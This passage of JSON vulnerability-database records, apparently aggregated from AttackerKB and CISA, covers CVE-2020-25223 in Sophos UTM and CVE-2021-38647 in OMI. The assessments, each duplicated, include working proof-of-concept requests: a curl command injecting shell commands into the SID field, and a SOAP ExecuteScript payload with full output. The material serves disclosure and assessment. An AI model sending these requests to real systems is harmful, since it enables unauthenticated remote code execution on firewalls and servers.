"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-06T08:11:34", "description": "A remote code execution vulnerability in the WebAdmin of SG UTM was recently discovered and responsibly disclosed to Sophos. It was reported via the Sophos bug bounty program by an external security researcher. The vulnerability has been fixed.\n\nSophos would like to thank \u0141ukasz Rupala for responsibly disclosing this issue to Sophos.\n\nThe remediation prevented users from remotely executing arbitrary code. There was no evidence that the vulnerability was exploited and to our knowledge no customers are impacted.\n\nFix included in SG UTM v9.705 MR5, v9.607 MR7, and v9.511 MR11 on September 17, 2020 \nUsers of older versions of SG UTM are required to upgrade to receive this fix\n\nWorkaround\n\nCustomers can protect themselves by ensuring their WebAdmin is not exposed to WAN.\n\nThis can be achieved by keeping Internal (LAN) (Network) or another internal-only network definition as the sole entry in Management\u2192WebAdmin Settings\u2192WebAdmin Access Configuration\u2192Allowed Networks.\n\n \n**Recent assessments:** \n \n**wvu-r7** at August 26, 2021 2:01am UTC reported:\n\n_Please see the [Atredis writeup](<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223>) for root cause analysis._\n\nCVE-2020-25223 has high attacker value and exploitability, since Sophos UTM is a [next-generation firewall (NGFW)](<https://en.wikipedia.org/wiki/Next-generation_firewall>), and the vulnerability offers unauthenticated attackers root access to a \u201cnetwork pivot\u201d device, all through a single HTTP request, demonstrated below:\n \n \n wvu@kharak:~$ curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|touch /tmp/vulnerable|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 33\n >\n * upload completely sent off: 33 out of 33 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 04:17:09 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n wvu@kharak:~$\n \n \n \n host:/root # ls -l /tmp/vulnerable\n -rw-r--r-- 1 root root 0 Aug 25 23:17 /tmp/vulnerable\n host:/root #\n \n\nChecking for the vulnerability can be accomplished by injecting a `sleep` command and timing the request\u2019s completion:\n \n \n wvu@kharak:~$ time curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|sleep 10|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 20\n >\n * upload completely sent off: 20 out of 20 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 15:47:17 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n \n real\t0m10.114s\n user\t0m0.020s\n sys\t0m0.018s\n wvu@kharak:~$\n \n\n**NinjaOperator** at August 25, 2021 5:02pm UTC reported:\n\n_Please see the [Atredis writeup](<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223>) for root cause analysis._\n\nCVE-2020-25223 has high attacker value and exploitability, since Sophos UTM is a [next-generation firewall (NGFW)](<https://en.wikipedia.org/wiki/Next-generation_firewall>), and the vulnerability offers unauthenticated attackers root access to a \u201cnetwork pivot\u201d device, all through a single HTTP request, demonstrated below:\n \n \n wvu@kharak:~$ curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|touch /tmp/vulnerable|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 33\n >\n * upload completely sent off: 33 out of 33 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 04:17:09 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n wvu@kharak:~$\n \n \n \n host:/root # ls -l /tmp/vulnerable\n -rw-r--r-- 1 root root 0 Aug 25 23:17 /tmp/vulnerable\n host:/root #\n \n\nChecking for the vulnerability can be accomplished by injecting a `sleep` command and timing the request\u2019s completion:\n \n \n wvu@kharak:~$ time curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|sleep 10|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 20\n >\n * upload completely sent off: 20 out of 20 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 15:47:17 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n \n real\t0m10.114s\n user\t0m0.020s\n sys\t0m0.018s\n wvu@kharak:~$\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2020-25223", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2020-09-23T00:00:00", "id": "AKB:0B46025D-A4C7-4FB0-ADA5-7244A30E7D6E", "href": "https://attackerkb.com/topics/MJewDF16Kl/cve-2020-25223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T20:36:58", "description": "Open Management Infrastructure Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 4:37am UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\n**noraj** at March 31, 2022 8:33pm UTC reported:\n\nRCE PoC using [`ExecuteScript`](<https://github.com/microsoft/SCXcore#runas-provider-executescript>) (multi-line shell script execution):\n \n \n wvu@kharak:~/Downloads$ curl -vs http://127.0.0.1:5985/wsman -H \"Content-Type: application/soap+xml\" -d @payload.xml | xmllint --format -\n * Trying 127.0.0.1...\n * TCP_NODELAY set\n * Connected to 127.0.0.1 (127.0.0.1) port 5985 (#0)\n > POST /wsman HTTP/1.1\n > Host: 127.0.0.1:5985\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/soap+xml\n > Content-Length: 1679\n > Expect: 100-continue\n >\n * Done waiting for 100-continue\n } [1679 bytes data]\n * We are completely uploaded and fine\n < HTTP/1.1 200 OK\n < Content-Length: 1393\n < Connection: Keep-Alive\n < Content-Type: application/soap+xml;charset=UTF-8\n <\n { [1393 bytes data]\n * Connection #0 to host 127.0.0.1 left intact\n * Closing connection 0\n <?xml version=\"1.0\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:wsen=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:e=\"http://schemas.xmlsoap.org/ws/2004/08/eventing\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:wsmb=\"http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd\" xmlns:wsman=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:wxf=\"http://schemas.xmlsoap.org/ws/2004/09/transfer\" xmlns:cim=\"http://schemas.dmtf.org/wbem/wscim/1/common\" xmlns:msftwinrm=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\" xmlns:wsmid=\"http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd\">\n <SOAP-ENV:Header>\n <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>\n <wsa:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</wsa:Action>\n <wsa:MessageID>uuid:19754ED3-CC01-0005-0000-000000010000</wsa:MessageID>\n <wsa:RelatesTo>uuid:00B60932-CC01-0005-0000-000000010000</wsa:RelatesTo>\n </SOAP-ENV:Header>\n <SOAP-ENV:Body>\n <p:SCX_OperatingSystem_OUTPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:ReturnValue>TRUE</p:ReturnValue>\n <p:ReturnCode>0</p:ReturnCode>\n <p:StdOut>\n Hello\n Goodbye\n </p:StdOut>\n <p:StdErr/>\n </p:SCX_OperatingSystem_OUTPUT>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n wvu@kharak:~/Downloads$\n \n\n`payload.xml`:\n \n \n <?xml version=\"1.0\"?>\n <s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n <s:Header>\n <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>\n <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n <a:ReplyTo>\n <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n </a:ReplyTo>\n <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n <w:OptionSet s:mustUnderstand=\"true\"/>\n <w:SelectorSet>\n <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n </w:SelectorSet>\n </s:Header>\n <s:Body>\n <p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n <p:Script>ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==</p:Script>\n <p:Arguments/>\n <p:timeout>0</p:timeout>\n <p:b64encoded>true</p:b64encoded>\n </p:ExecuteScript_INPUT>\n </s:Body>\n </s:Envelope>\n \n\n[More context\u2026](<https://twitter.com/wvuuuuuuuuuuuuu/status/1438002644228968452>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-38647", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T00:00:00", "id": "AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "href": "https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2023-02-09T14:00:22", "description": "_(Updated October 7, 2021)_\n\nApache has released additional fixes for CVE-2021-41773, which is tracked as [CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>). For more information see the [Apache vulnerabilities page](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>). \n\n_(Originally published October 6, 2021)_\n\nThe Apache Software Foundation has released Apache HTTP Server version 2.4.50 to address two vulnerabilities. An attacker could exploit these vulnerabilities to take control of an affected system. One vulnerability, [CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>), has been exploited in the wild. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Apache HTTP Server 2.4.50 